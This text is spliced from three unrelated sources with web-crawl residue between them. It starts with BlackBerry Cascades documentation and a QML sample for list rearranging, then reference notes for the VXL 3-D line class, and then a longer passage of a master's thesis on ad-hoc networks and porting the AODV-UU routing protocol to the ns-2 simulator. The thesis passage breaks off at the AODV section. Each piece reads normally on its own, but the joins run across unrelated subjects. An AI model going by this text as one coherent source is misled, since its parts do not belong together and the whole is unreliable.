The onMoveEnded() and onMoveAborted() signals both result in the item snapping back to its previous position in the list. However, the onMoveAborted() signal gives your app the option to deny the move operation or prompt the user for input.

During rearrange mode and move sessions, certain actions that your app performs can cause the list to exit the current state forcefully. The list might also block some actions entirely. The following table describes how a list responds to actions that your app performs. Cases not covered in the table are treated as normal (for example, setting the scroll indicator mode).

The following code sample shows a simple list with 20 items. Rearrange mode is enabled, and the list supports an Undo operation of the most recent move action.

    Page {
        content: Container {
            id: container
            property int itemOrigin: -1
            property int lastItemDestination: -1

            function undoItemMove() {
                if ( lastItemDestination != -1 && itemOrigin != -1) {
                    theDataModel.move( lastItemDestination, itemOrigin );
                    console.log( "Item moved back from " + lastItemDestination +
                                 " to " + itemOrigin );
                    itemOrigin = -1;
                    lastItemDestination = -1;
                } else {
                    console.log( "Nothing to undo!" )
                }
            }

            Button {
                text: "Undo"
                onClicked: {
                    container.undoItemMove();
                }
            }

            ListView {
                id: theListView
                layout: StackListLayout {
                    id: thelayout
                }
                attachedObjects: [
                    ArrayDataModel {
                        id: theDataModel
                    }
                ]

                function isMoveAllowed() {
                    console.log("Checking if allowed to move...");
                    return true;
                }

                objectName: "listView"
                dataModel: theDataModel

                rearrangeHandler {
                    // Do not activate the handler here. It will be forcefully
                    // deactivated when the data model is assigned.
                    // active: true

                    onMoveStarted: {
                        console.log("onMoveStarted: " + event.startIndexPath);
                        container.itemOrigin = event.startIndexPath[0];
                    }
                    onMoveEnded: {
                        console.log("onMoveEnded: " + event.endIndexPath);
                    }
                    onMoveUpdated: {
                        console.log("onMoveUpdated: " + event.fromIndexPath[0] +
                                    " -> " + event.toIndexPath[0]);
                        theDataModel.move( event.fromIndexPath[0], event.toIndexPath[0] );
                        if (!isMoveAllowed()) {
                            event.denyMove();
                        } else {
                            container.lastItemDestination = event.toIndexPath[0];
                        }
                    }
                    onMoveAborted: {
                        console.log("onMoveAborted: " + event.endIndexPath);
                        container.undoItemMove();
                    }
                    onActiveChanged: {
                        console.log("active changed: " + active);
                    }
                }

                onCreationCompleted: {
                    for ( var a = 0; a < 20; a++ ) {
                        theDataModel.append("Item" + a);
                    }
                    rearrangeHandler.setActive(true);
                }
            }
        }
    }

Last modified: 2014-05-14
http://developer.blackberry.com/native/documentation/cascades/ui/lists/list_view_selection.html
CC-MAIN-2014-41
refinedweb
3,334
53.1
vgl_infinite_line_3d

Represents a 3-d line with position defined in the orthogonal plane passing through the origin.

#include <vgl_infinite_line_3d.h>

The line direction is t_. The 2-d plane coordinate system (u, v) is aligned with the 3-d coordinate system (X, Y, Z), where v = t x X and u = v x t. Defined at line 29 of vgl_infinite_line_3d.h.

Constructors and destructor:
- Default constructor - does not initialise!
- Copy constructor.
- Construct from x0 and direction.
- Construct from two points.
- Construct from a point and direction.
- Construct from a line segment.
- Construct from a line defined by 2 points.
- Destructor.

Member functions:
- The unit vectors perpendicular to the line direction.
- Check if point p is on the line.
- The comparison operator.
- Return the point on the line closest to the origin.
- Return a point on the line defined by a scalar parameter t; t = 0.0 corresponds to the closest point on the line to the origin.
- Assignment.
- Accessors.
- Write to stream.
- Read from stream.

Related functions:
- Return the intersection line of a set of planes (uses a list, to distinguish from the point return).
- Return the intersection line of a set of weighted planes (uses a list, to distinguish from the point return).
- Return the intersection point of infinite lines, if concurrent.
- Return the intersection point of two lines, if concurrent.
- Return true if the line intersects a box; if so, compute the intersection points.

Member data:
- x0_ : line position vector.
- t_ : line direction vector (tangent).
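Since the page above lists only the member briefs, a short usage sketch may be easier to follow. Treat it as a hedged example: the two-point and point-plus-direction constructors and contains() follow the briefs above, while the template parameter, the point accessors, and the point_t() name are assumptions that should be verified against the vgl headers.

    #include <vgl/vgl_infinite_line_3d.h>
    #include <vgl/vgl_point_3d.h>
    #include <vgl/vgl_vector_3d.h>
    #include <iostream>

    int main()
    {
        vgl_point_3d<double> p0(0.0, 0.0, 0.0);
        vgl_point_3d<double> p1(1.0, 2.0, 2.0);

        // Construct from two points (see "Construct from two points" above).
        vgl_infinite_line_3d<double> line(p0, p1);

        // Construct from a point and a direction vector.
        vgl_infinite_line_3d<double> same_line(p0, vgl_vector_3d<double>(1.0, 2.0, 2.0));

        // Check whether a point lies on the line.
        vgl_point_3d<double> q(0.5, 1.0, 1.0);
        std::cout << "q on line: " << (line.contains(q) ? "yes" : "no") << '\n';

        // A point on the line for scalar parameter t; t = 0.0 is the point
        // closest to the origin (method name assumed to be point_t()).
        vgl_point_3d<double> r = line.point_t(3.0);
        std::cout << "point_t(3.0) = (" << r.x() << ", " << r.y() << ", " << r.z() << ")\n";
        return 0;
    }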
http://public.kitware.com/vxl/doc/release/core/vgl/html/classvgl__infinite__line__3d.html
crawl-003
refinedweb
412
62.85
Uppsala Master's Thesis in Computer Science
Examensarbete DV3, 1DT150
December 18, 2002

Porting AODV-UU Implementation to ns-2 and Enabling Trace-based Simulation

Björn Wiberg
Information Technology, Department of Computer Systems
Uppsala University, Box 337, SE Uppsala, Sweden

Abstract

In mobile ad-hoc networks, autonomous nodes with wireless communication equipment form a network without any pre-existing infrastructure. The functionality of these networks heavily depends on so-called ad-hoc routing protocols for determining valid routes between nodes. The main goal of this master's thesis has been to port AODV-UU, a Linux implementation of the AODV (Ad hoc On-Demand Distance Vector) routing protocol, to run in the ns-2 network simulator. Automated source code extraction lets the ported version use the same source code as the conventional Linux version, to the extent this is possible. The second goal was to use logfiles from the APE testbed, a Linux-based ad-hoc protocol evaluation testbed, for enabling trace-based simulations with AODV-UU. Results of trace-based simulations show that it is possible to obtain packet delivery ratios closely corresponding to those of real-world experiments.

Supervisor: Henrik Lundgren
Examiner: Christian Tschudin
Passed:

Acknowledgements

I would like to thank my supervisor, Henrik Lundgren, for setting up and organizing this master's thesis project. Without his help, this project would probably not have been carried out at all. I am very grateful for all the support that I have received.

Also, I would like to thank Erik Nordström, the author of AODV-UU, for his highly appreciated help during this project. Not only did he assist me and make me part of the development team during the initial stages of porting AODV-UU to the network simulator; he has also contributed with many good ideas that made the porting process easier, and helped me with implementation questions that popped up from time to time.

Stefan Lindström, a very good friend of mine also working on his master's thesis project, has helped me with C and C++ issues during the many hours of implementation and testing. Thanks, Stefan.

Finally, I would like to thank my examiner, Christian Tschudin, who kindly agreed to take on the examination role right from the beginning of this project, and all the other members of the CoRe (Communications Research) group at the Department of Computer Systems (DoCS) at Uppsala University, Sweden, for their pleasant company during the entire project.
ii 3 Contents 1 Introduction Background Proposed goals Accomplishments Document overview Ad-hoc Networks Introduction Properties of ad-hoc networks Comparisons with wired networks Infrastructure Addressing Routing Ad-hoc networking issues Wireless medium access Addressing Network security Applications of ad-hoc networks Conclusions Ad-hoc Routing Protocols Introduction The need for ad-hoc routing protocols Classification of ad-hoc routing protocols Properties of ad-hoc routing protocols The IETF MANET working group Examples of ad-hoc routing protocols DSDV OLSR AODV DSR TORA Conclusions AODV-UU Introduction Installation and usage Configuration Interaction with IP The Netfilter framework Performance iii 4 4.5 Software modules Non-kernel-related modules Kernel-related modules Packet handling Packet arrival Initial packet processing Data packet processing AODV control message processing AODV control message sending Current status The ns-2 Network Simulator Introduction Performing simulations Main building blocks Simulation scenario contents Simulation execution and analysis The OTcl/C++ environment Class hierarchy Event scheduling Packet delivery Nodes Node basics Node configuration and creation Node addressing Routing Links Queues Packets Packet types and headers The common header Packet allocation and de-allocation Agents Agent state information Agent packet methods Agent attachment Connecting agents Application attachment Creating a new agent Timers Traffic generators Error models Usage in wired networks Usage in wireless networks Mobile networking Mobile nodes Packet transmission Packet reception Simulation scenario setup Mobile node configuration and creation Mobile node movements iv 5 Routing in mobile networking Miscellaneous features Radio propagation models Free space model Two-ray ground reflection model Shadowing model Communication range adjustment Network interface characteristics Receive threshold calculation Trace files Trace configuration Trace formats Problems encountered with ns Summary Porting AODV-UU to ns Introduction Conversion overview Initial decisions Similar projects Areas of concern Environmental differences Network interfaces Packet handling Kernel interaction Variables Timers Logging Non-applicable features Different approaches of conversion Monolithic class approach Object-oriented approach Daemon approach The porting process Choice of conversion approach Conceptual overview The AODVUU class Methods Source code extraction Packet types and headers Packet buffering and handling Addressing Timers Logging Tracing Excluded features and modules Configuration and usage Extending the AODV-UU routing agent General C vs C++ issues Platform portability issues Miscellaneous source code changes v 6 Locating source code changes The AODV-UU Makefile Integrating AODV-UU with ns Bugs found by simulation Future work Summary Testing the Functionality of AODV-UU in ns Introduction General setup simple-wireless-aodv-uu.tcl Scenario overview Scenario setup Scenario description and results Conclusions wireless1-aodv-uu.tcl Scenario overview Scenario setup Results and conclusions The Roaming Node scenario Scenario overview Scenario setup Scenario description and simulation results Comparisons with real-world results Other differences between simulations and real-world experiments Comparisons with existing AODV implementation Conclusions Enabling Trace-based Simulation Introduction The APE testbed APE logging Modeling connectivity in ns Communication range adjustment Error model usage 
Existing error models Conclusions Proposed solution Related research The SourceDrop error model Functionality Technical details APE logfile processing Initial testing Roaming Node revisited Simulation scenario setup Results Discussion Conclusions vi 7 9 Summary and Future Work Summary of ns-2 port of AODV-UU Summary of trace-based simulation Comparisons of results General project compliance Future work A Glossary 95 vii 8 List of Figures 2.1 An example ad-hoc network The hidden terminal problem The exposed node problem Netfilter hooks for IP Packet handling of AODV-UU Partial ns-2 class hierarchy Discrete event scheduling in ns Packet delivery in ns Composite construction of a wired unicast node Composite construction of a uni-directional link Packet contents Mobile node schematics Layout of the wireless1-aodv-uu.tcl scenario Layout of the Roaming Node scenario Routing agent comparison (link layer feedback) Routing agent comparison (HELLO messages) viii 9 List of Tables 5.1 Selected options for node configuration Available routing modules Agent state information Typical path loss exponent ( ) values Typical shadowing deviation ( ) values Trace log contents (old trace format) Trace log contents (new trace format) Example application-level trace log contents (new trace format) AODV-UU routing agent default configuration Roaming Node Ping statistics (simulation) Roaming Node Ping success ratio (real-world) Roaming Node Ping statistics comparison (run 1) Roaming Node Ping statistics comparison (run 2) ix 10 Chapter 1 Introduction 1.1 Background During recent years, the market of mobile communication has literally exploded. Cellular phones and other mobile devices with built-in wireless communication have gained enormous popularity, and because of this, the term connectivity has come to mean much more than it did just a couple of years ago. Computer networks, traditionally viewed as infrastructure of a fixed form, have evolved into combinations of wired and wireless networks to suit today s needs of mobile communication. As the mobility of users continues to increase, a special type of networks will be gaining more and more attention mobile ad-hoc networks. In a mobile ad-hoc network, nodes do not rely on any existing network infrastructure. Instead, the nodes themselves form the network and communicate through means of wireless communication. Nodes will have to forward network traffic on behalf of other nodes to allow communication to take place between nodes that are out of each others immediate radio range. Hence, routing of network traffic becomes a central issue in these networks. For this purpose, numerous ad-hoc routing protocol specifications have been proposed, mainly by the IETF working group MANET [1]. Many of these proposals have been evaluated through simulations in network simulators [2, 3], but only a few of them have been evaluated through real-world tests [4, 5]. Both these approaches have their respective advantages and disadvantages. In simulations, experiments can easily be repeated and different parameters varied, which allows the impact of them to be studied. However, the drawback is that simplifications often are made in the models of the simulator, e.g. the models of wireless signal propagation. In real-world experiments, a routing protocol implementation can be evaluated without any specific assumptions or simplifications, but the testing environment can make it difficult to correlate observed results with details of the implementation. 
Therefore both approaches are useful, and complement each other. 1.2 Proposed goals The proposed goals of this master s thesis are the following: To port AODV-UU [6], one of the existing implementations of the mobile ad-hoc routing protocol AODV [7], to run in the ns-2 network simulator [8]. To enable trace-based AODV-UU simulations using logs from experiments conducted in the APE testbed [4], a Linux-based testbed for evaluation of ad-hoc protocols. To compare results of trace-based simulations with real-world results, and, if possible, improve existing models in the ns-2 network simulator. 1 11 1.3 Accomplishments All the proposed goals were successfully achieved during this master s thesis project. AODV-UU was ported to the ns-2 network simulator, using the same code base for simulations as for real-world experiments. Tracebased simulations with AODV-UU were performed using a custom-made error model to model connectivity between wireless nodes, and the results indicate that trace-based simulations allow packet delivery ratios to be obtained that are very close to those of real-world experiments. On a personal level, this master s thesis project has provided a considerable amount of insight on how to plan, perform and account for a scientific project. The initial question marks regarding the porting of AODV-UU were soon replaced by curiosity and a certain degree of self-confidence as I got acquainted to AODV-UU and the ns-2 network simulator. I was very happy to see the ported version of AODV-UU making it to the version 0.5 release in mid-june 2002 this was one of the major milestones during the project. 1.4 Document overview The rest of this document is outlined as follows. Chapter 2 gives an introduction to mobile ad-hoc networks in general and describes how they differ from conventional networks. Problems specific to wireless communication in mobile ad-hoc networks are pointed out, and some example applications of ad-hoc networks are mentioned. Chapter 3 describes the need for and properties of ad-hoc routing protocols. Some common ad-hoc routing protocols are reviewed, along with their suitability given different network and mobility conditions. Chapter 4 gives a technical overview of the AODV-UU implementation of the AODV routing protocol. The functionality of its software modules is described, and the packet handling is studied in detail. Chapter 5 gives an introduction to the ns-2 network simulator. Some of its network components are reviewed, and brief examples are provided to illustrate their usage. Emphasis is put on agents, mobile nodes and wireless communication, as this is of particular importance for the remaining chapters. Chapter 6 describes the process of porting the AODV-UU implementation to run in ns-2. The required changes to the implementation and the steps of integrating it with the network simulator are described in detail. Instructions on configuration and usage are provided as a reference. In Chapter 7, the functionality of the ported version of AODV-UU is tested through a number of simulation scenario test-runs. Simulation results are compared to expected results and real-world results, and some differences between simulations and real-world experiments are pointed out. Chapter 8 describes the usage of logs from real-world experiments for enabling trace-based simulations with AODV-UU. An introduction to the APE testbed is given, followed by a brief investigation of its logging features. 
Different methods of incorporating support for trace-based simulations in the network simulator are reviewed, and the resulting model for modifying network connectivity in the simulator is described. Several test-runs are conducted using trace-based simulation support, and the results are evaluated. Finally, Chapter 9 summarizes the outcome of the entire project, compares the results to the proposed goals, verifies general project compliance and provides some notes on future work. 2 12 Chapter 2 Ad-hoc Networks 2.1 Introduction A wireless mobile ad-hoc network (MANET) is a network consisting of two or more mobile nodes equipped with wireless communication and networking capabilities, but lacking any pre-existing network infrastructure. Each node in the network acts both as a mobile host and a router, offering to forward traffic on behalf of other nodes within the network. For this traffic forwarding functionality, a routing protocol is needed. Figure 2.1: An example ad-hoc network. Each node acts both as a host and a router, forwarding traffic on behalf of other nodes. The term ad-hoc suggests that the network can take on different forms, suitable for the task at hand, which in turn implies that ad-hoc networks are of a highly adaptive nature. In the following sections, the properties and applications of ad-hoc networks are investigated further. 2.2 Properties of ad-hoc networks Perhaps the most important property of ad-hoc networks is that they do not rely on any pre-existing network infrastructure. Instead, these networks are formed in an on-demand fashion as soon nodes come sufficiently close to each other. This eliminates the need for stationary network components, such as routers and base stations, as well as cabling and central administration. Nodes in an ad-hoc network should offer to forward network traffic on behalf of other nodes. If they refuse to do so, the connectivity between nodes in the network is affected in a negative manner. The functionality and usefulness of an ad-hoc network heavily depends on this forwarding feature of participating nodes. Ad-hoc networks are often autonomous in the sense that they only offer connectivity between participating nodes, but no connectivity to external networks such as the Internet. In theory, however, nothing prevents a multi-homed node (with connections to both the ad-hoc network and one or more external networks) from acting as a gateway between those networks. The dynamic topology imposed by ad-hoc networks is another very important property. Since the topology is subject to frequent changes, due to node mobility and changes in the surrounding environment, special considerations have to be taken when routing protocols are selected for the nodes. Traditional routing protocols 3 13 such as OSPF [15] and RIP [16, 17] will fail to efficiently adapt to a dynamic topology of this kind, since frequent topology changes are not part of their normal operation. Therefore, special routing protocols are needed for ad-hoc networks. Differences in the radio transmitter and receiver equipment of nodes, such as different transmission ranges and reception sensitivities, may lead to uni-directional links which could complicate routing in the ad-hoc network. Furthermore, not only communications equipment may differ between nodes, but also other resources such as battery capacity, CPU capacity and the amount of memory available. 
As an effect, nodes in an ad-hoc network may have very different abilities to participate in the network, considering the amount of service that they are willing provide to other nodes. 2.3 Comparisons with wired networks Infrastructure A conventional network consists of a more or less fixed infrastructure, built of nodes, routers, switches, gateways, bridges, base stations and other network devices, all connected by wires. The main property of these networks is that their topologies are more or less fixed. Any wish to reconfigure the network or add network devices requires physical intervention, and possibly a loss of service to some or all of the nodes while these changes are carried out. Furthermore, the administration of these networks is often centralized, because many of the nodes in the network usually rely on central servers for storage, access and processing of data. Wireless networks in general and ad-hoc networks in particular can resolve some of these issues. Using wireless communication instead of fixed cabling solves the problem of cabling reconfiguration and the possible downtime caused by this. Ad-hoc networks add to this the ability of forming networks on-the-fly without any existing infrastructure. Ideally, the result is an on-demand network having all the advantages of wireless networks combined with virtually hassle-free setup and operation, as opposed to that of conventional, wired networks. Finally, since ad-hoc networks are formed by the nodes themselves, and the network topology may change rapidly, centralized solutions are not as common as in conventional networks Addressing In a conventional network, addresses and other network parameters are either manually assigned or handed out to nodes using special protocols, such as DHCP (Dynamic Host Configuration Protocol) [18]. The hardware address of the network interface can be checked by an address allocation entity (e.g. a DHCP server), and an IP address assigned to the node. In an ad-hoc network, the addressing issue becomes more complicated since there is no obvious, central authority in the network responsible for handing out addresses. Furthermore, there is no guarantee that the addresses taken by (or somehow assigned to) nodes reflect their geographical locations at all, due to node mobility Routing Routing in a conventional network is performed by special routers; either hardware-based routers specialized for this task, or computers equipped with several network interfaces and accompanying software to perform the actual routing. In an ad-hoc network, routing is instead carried out by the participating nodes themselves. Each node has the ability to forward traffic for others, and this ability is what makes it possible for traffic to flow through the ad-hoc network over multiple hops. Unlike a stationary router in a conventional network, an ad-hoc node does not need to be equipped with several network interfaces, since all communication is usually done through a single wireless channel. Another difference in ad-hoc network routing is that no subnetting assumptions are made, i.e., routing tables may end up consisting of separate IP addresses (which need not have any correlation with each other). As an effect, a flat addressing structure is imposed. In a conventional network, routing tables instead usually contain network prefixes not entire addresses paired with network interface identifiers. 
4 14 2.4 Ad-hoc networking issues In this section, some of the practical problems encountered in wireless ad-hoc networks are presented along with proposed solutions found in literature and related research material. Since nodes in an ad-hoc network use wireless communication, many of the issues encountered in wireless LANs apply to ad-hoc networks as well Wireless medium access Since a mobile wireless ad-hoc network uses a wireless medium for data transmission, access to this medium must be controlled to prevent nodes from attempting to transmit data simultaneously. This control is provided by a MAC (Media Access Control) protocol, such as IEEE [34]. A well-known problem in this context is the hidden terminal problem. It occurs when two nodes, out of each others radio range, simultaneously try to transmit data to an intermediate node, which is in radio range of both the sending nodes. None of the sending nodes will be aware of the other node s transmission, causing a collision to occur at the intermediate node. This is shown in Figure 2.2. Sender Receiver Sender Figure 2.2: The hidden terminal problem. The sending nodes are unaware of each others transmissions, resulting in a collision at the receiving node. To avoid this problem, a handshake protocol could be used, such as the RTS-CTS handshake protocol. A node that wishes to send data is required to ask for permission before doing so, by sending a RTS (Request To Send) message to the receiving node. The receiving node then replies with a CTS (Clear To Send) message to grant this request. The CTS message can be heard by all nodes within radio range of the receiving node, and instructs them not to use the wireless medium since another transmission is about to take place. The node that requested the transmission can then begin sending data to the receiving node. This however does not provide a perfect solution to the hidden terminal problem. For instance, if RTS and CTS control messages collide at one of the nodes, that node will be unaware of both these messages. Since it believes that the channel is free to use, it could reply to future RTS messages from other nodes, causing a collision with the ongoing data transfer. Another problem in wireless medium access is the exposed node problem. It occurs when a node overhears another transmission and hence refrains to transmit any data of its own, even though such a transmission would not cause a collision due to the limited radio range of the nodes. This is shown in Figure 2.3. Clearly, the exposed node problem is leads to sub-optimal utilization of the wireless medium. Some proposed solutions are the usage of directional antennas (instead of omni-directional antennas) or separate channels for control messages and data [13]. Finally, a technique called transmission power control [11] could serve a dual purpose in this context. By adjusting the transmission power of nodes, interference can be reduced at the same time as nodes save valuable energy Addressing The issue of assigning unique identities to nodes in an ad-hoc network, e.g. in form of IP addresses, is another area of research. It is not obvious how such address allocations should be made, given the fact that mobile adhoc networks potentially could grow very large and the mobility of nodes may be very high. Proposed solutions 5 15 Data Figure 2.3: The exposed node problem. A node wishing to transmit data refrains to do so because it overhears an ongoing transmission. to the addressing problem can e.g. 
be found in [12], where nodes select their own IP addresses at random, and use ARP (Address Resolution Protocol) [14] for translating network hardware addresses into IP addresses and vice versa. Address collisions are detected by listening to ARP traffic from other nodes, spotting any attempts to use IP addresses that are already occupied. The addressing problem is one of the major problems restraining the usage of ad-hoc networks today, since all nodes need to be assigned unique addresses for any unicast packet transmission to take place. It is of great importance that this issue will be investigated further, to allow ad-hoc networks to be created on-the-fly as intended Network security Network security in ad-hoc networks is a concern of great importance. Transmission of sensitive data, forwarded by intermediate nodes whose intentions are unknown, may turn out to be unsuitable at best and fatal at worst. Countermeasures need to be taken to prevent unwanted exposure of sensitive information in the ad-hoc network. This could be achieved by using conventional encryption; however, key exchange techniques and public key infrastructure (PKI) solutions are harder to apply to ad-hoc networks, because of the lack of network infrastructure and authorities of trust. Network security could also be used for dealing with denial-of-service (DoS) or spoofing attacks against an ad-hoc network. For instance, security-enhanced versions of ad-hoc routing protocols could be used to ensure that the operation of the routing protocol (and hence, largely, the operation of the ad-hoc network) remains unaffected by attempts to forge or alter routing protocol control messages. A good overview of wireless ad-hoc network security issues can be found in [21], which covers topics such as trust, key management, secure routing, intrusion detection and availability, and also provides references to current research material. 2.5 Applications of ad-hoc networks Several applications of ad-hoc networks have been proposed. Some of the most common ones are: Spontaneous networks: Business colleagues or participants of a meeting could use an ad-hoc network for sharing documents, presentation material and notes on-the-fly. Disaster areas: In the event of a disaster, such as earthquake or fire, the existing network infrastructure may very well be out of order. Ad-hoc networks could be used by emergency personnel (police, medical staff, rescue coordinators, fire brigades etc.) for establishing an on-site communications network. As a result of this, valuable time can be saved in these situations, perhaps saving lives. Building of wireless networks: Ad-hoc networks could be used for building wireless networks where installation of network cabling is difficult, impossible or too expensive. Examples include ancient build- 6 16 ings that may not be modified, or are built in such a way that wiring becomes difficult. Mobile ad-hoc nodes could replace both conventional base stations and servers. Wireless sensor networks is another application of ad-hoc networks, where thousands or even ten thousands of electronic sensors populate the network. These sensors collect data and report to selected nodes at predetermined times or with certain intervals. The collected data can subsequently be used in larger computations, with the ultimate intention of generating overall statistics based on the large number of reports. Wireless sensor networks could be used in the military (e.g. 
for determining if an area is safe in terms of radiation), but also in everyday applications such as quality control and gathering of weather information. 2.6 Conclusions To conclude, ad-hoc networks possess special properties that make them attractive, but these properties come at a certain cost, e.g. in terms of network security. It is up to the participants of such a network (i.e., the nodes) to decide if they are willing to pay this price, given a specific task at hand. Hopefully, future research in ad-hoc networking will solve some of the practical issues that these networks are facing right now. In pace with the increased mobility of users, ad-hoc networks certainly have the potential to become very useful and popular. 7 17 Chapter 3 Ad-hoc Routing Protocols 3.1 Introduction For a packet to reach its destination in an ad-hoc network, it may have to travel over several hops. The main purpose of a routing protocol is to set up and maintain a routing table, containing information on where packets should be sent next to reach their destinations. Nodes use this information to forward packets that they receive. In this chapter, the need for ad-hoc routing protocols is discussed, and some ad-hoc routing protocols are described. The intention is not to present all existing protocols, nor to provide full technical details, but rather to describe the main ideas behind some of them and how they work. For this master s thesis, the AODV routing protocol (described in section 3.6.3) is of particular interest. 3.2 The need for ad-hoc routing protocols Routing is not a new issue in computer networking. Link-state routing (e.g. OSPF [15]) and distance vector routing (e.g. RIP [16, 17]) have existed for a long time and are widely used in conventional networks. However, they are not very suitable for use in mobile ad-hoc networks, for a number of reasons: They were designed with a quasi-static topology in mind. In an ad-hoc network, with a frequently changing network topology, these routing protocols may fail to converge, i.e., to reach a steady state. They were designed with a wired network in mind. In such a network, links are assumed to be bidirectional. In mobile ad-hoc networks, this is not always the case; differences in wireless networking hardware of nodes or radio signal fluctuations may cause uni-directional links, which can only be traversed in one direction. They try to maintain routes to all reachable destinations. In mobile ad-hoc networks with a very large number of nodes, such as a large wireless sensor networks, this may become infeasible because of the resulting very large number of routing entries. In mobile ad-hoc networks, periodic flooding of routing information is relatively expensive, since all nodes compete for access to the wireless medium (which usually offers a rather limited amount of bandwidth). Therefore, special routing protocols are needed for ad-hoc networks. 3.3 Classification of ad-hoc routing protocols Ad-hoc routing protocols are usually classified by the approach they use for maintaining and updating their routing tables. The two main approaches are: 8 18 Proactive (table-driven) operation: In this approach, the routing protocol attempts to maintain a routing table with routes to all other nodes in the network. Changes in the network topology are propagated by means of updates throughout the entire network to ensure that all nodes share a consistent view of the network. 
The advantage of this approach is that routes between arbitrary source - destination pairs are readily available, all the time. The disadvantages are that the routing tables will occupy a large amount of space if the network is large, and that the updates may lead to inefficient usage of network resources if they occur too frequently. Reactive (on-demand-driven) operation: In this approach, routes to a destination are acquired by a route discovery process in an on-demand fashion, i.e., a route is not searched for unless it is needed. The acquired route is maintained by a route maintenance process until it has been determined that the route is not needed anymore, or has become invalid. The advantage of this approach is that unnecessary exchange of route information is avoided, leaving more network resources available for other network traffic. The disadvantage is that route look-ups could take some time. Depending on the application, this may or may not be acceptable. There also exist hybrid approaches, combining both the proactive and the reactive approach. A more finegrained classification of ad-hoc routing protocols and a taxonomy for comparing them can be found in [33]. 3.4 Properties of ad-hoc routing protocols As mentioned previously, the characteristics of ad-hoc networks call for routing protocols specifically made for these networks. According to [20], some desirable properties of ad-hoc routing protocols are the following: Distributed operation: This is essential to mobile ad-hoc networks. Since the mobile ad-hoc network does not rely on any pre-existing infrastructure, its operation should be distributed and decentralized. Loop-freedom: This is usually desired, although may not be strictly required. Ensuring loop-freedom could help avoiding worst-case scenarios, such as packets looping within the network for arbitrary periods of time. Demand-based (reactive) operation: Instead of maintaining routing tables with information on routes between all nodes in the network, the routing protocol should find routes as they are needed. This avoids wasting bandwidth of the network. Proactive operation: This is the opposite of reactive operation. If the overhead of searching routes on an on-demand basis is unacceptable for the application, and the resources of the network (e.g. bandwidth) and its nodes (e.g. energy constraints) allow for it, proactive operation could be desired instead. Security: It is desirable that the routing protocol has the ability to utilize security techniques to prohibit disruption or modification of the operation of the protocol. Sleep period operation: Since nodes in a mobile ad-hoc network usually have a limited amount of energy (e.g. battery power), it is desirable that the routing protocol has the ability to cope with situations where nodes may have powered themselves off temporarily to save energy. Support for uni-directional links: Since there is no guarantee that links are bi-directional in a mobile adhoc network, the ability to use separate uni-directional links in both directions to replace a bi-directional link could be of great value, should such a situation occur. 9 19 3.5 The IETF MANET working group Specifications for many existing ad-hoc routing protocols have been developed by the IETF (Internet Engineering Task Force) working group MANET [1], a working group focusing on mobile ad-hoc networks. 
Their near-term goal is to standardize one or more intra-domain unicast routing protocols, and currently, they have published drafts for the following nine ad-hoc routing protocols: AODV (Ad hoc On-demand Distance Vector) [7] DSR (Dynamic Source Routing) [23] ZRP (Zone Routing Protocol) [24] OLSR (Optimized Link State Routing) [25] LANMAR (Landmark Routing Protocol) [26] FSR (Fisheye State Routing) [27] IERP (Interzone Routing Protocol) [28] IARP (Intrazone Routing Protocol) [29] TBRPF (Topology Broadcast based on Reverse-Path Forwarding) [30] In addition to developing routing protocol specifications, the MANET working group also serves as a meeting place and forum for discussions on mobile ad-hoc networking issues in general. As such, it has become an extremely valuable resource for researchers and developers in this area. 3.6 Examples of ad-hoc routing protocols In this section, some ad-hoc routing protocols are presented. Focus is put on how they work and their suitability given different network and mobility conditions, as this is important for their deployment in an ad-hoc network DSDV Although perhaps somewhat outdated, DSDV has influenced many other ad-hoc routing protocols. It is included here as a reference. Description DSDV (Destination-Sequenced Distance-Vector) [22] is a proactive ad-hoc routing protocol that is based on the distributed Bellman-Ford routing algorithm [19, pp ]. The classical count-to-infinity problem of Bellman-Ford is avoided by using sequence numbers, allowing nodes to distinguish between stale and new routes and ensuring loop-freedom. Operation Since DSDV is a proactive routing protocol, each node maintains a routing table with all other destinations in the network listed along with the next hop and the number of required hops to reach each destination. Routing table updates in DSDV are distributed by two different types of update packets: Full dump: This type of update packet contains all routing information available at a node. As a consequence, it may require several NPDUs (Network Protocol Data Units) to be transferred if the routing table is large. Full dump packets are transmitted infrequently if the node only experiences occasional movement. 10 20 Incremental: This type of update packet contains only the information that has changed since the latest full dump was sent out by the node. Hence, incremental packets only consume a fraction of the network resources compared to a full dump. Broadcasts of route information contain the destination address, the number of hops required to reach the destination (the cost metric), the highest sequence number known of that destination and another sequence number, unique to each broadcast. Nodes receiving such a broadcast will update their routing tables if the destination sequence number is greater than the existing one, or if it equals the existing one but the number of hops to reach the destination is smaller. New routes will immediately be advertised to a node s neighbors, and updated routes will cause an advertisement to be scheduled for transmission within a certain settling time. For its operation, DSDV requires the values of three parameters to be set: The incremental update period The full update period The settling time for routes The values of these parameters largely determine the performance of DSDV, and must be chosen carefully. Research, such as in [2] and [3], indicates that DSDV experiences low throughput and fails to converge as node mobility increases. 
Therefore, the DSDV protocol is probably best used in ad-hoc networks where node mobility is low or moderate OLSR Description OLSR (Optimized Link State Routing) [25] is another proactive ad-hoc routing protocol. It is an optimization of the classical link state algorithm [19, pp ] tailored to mobile wireless LANs. The key concept of OLSR is that of multipoint relays (MPRs). Multipoint relays are selected nodes that broadcast messages during the flooding process. This approach reduces the number of control messages transmitted over the network. In addition, the control messages of OLSR contain less information than those of the classical link state algorithm, limiting the amount of overhead even further. OLSR provides optimal routes in terms of number of hops and is supposed to be particularly suitable for large and dense networks. It works independently from other protocols, and makes no assumptions about the underlying link layer. Operation Each node selects a set of multipoint relays (MPRs) among its neighbors, such that the set covers all nodes that are two hops away in terms of radio range. Also, each node keeps information about the set of neighbors which have selected it as one of their MPRs. This information is obtained from periodic HELLO messages. (Periodic HELLO messages are used for neighbor sensing in OLSR, since the protocol does not make any assumptions about the underlying link layer.) Routes are established through the selected MPRs of a node. This means that a path to a destination is a series of hops through MPRs, from the source to the destination. Since OLSR is a proactive protocol, routes are immediately available when needed. Changes in connectivity cause link state information to be broadcasted by a node. This information is then re-broadcasted by the other nodes in that node s MPR set only, reducing the number of messages required to flood the information throughout the network. Also, the link state information broadcasted by a node contains only the state of links to nodes in its MPR set, not all its neighbors. This is sufficient, since each two-hop neighbor of a node is a one-hop neighbor of some node in the MPR set. 11 21 Summary OLSR is an attractive proactive routing protocol suitable for large and dense ad-hoc networks. One of its benefits is that it does not make any assumptions about the underlying link layer, allowing it to be used in a variety of configurations. Neighbor sensing is performed by periodic beaconing rather than link layer feedback. If route acquisition time is important to the application, the ad-hoc network is large and/or dense and traffic is exchanged between a large number of nodes, OLSR could be a suitable choice AODV Description AODV 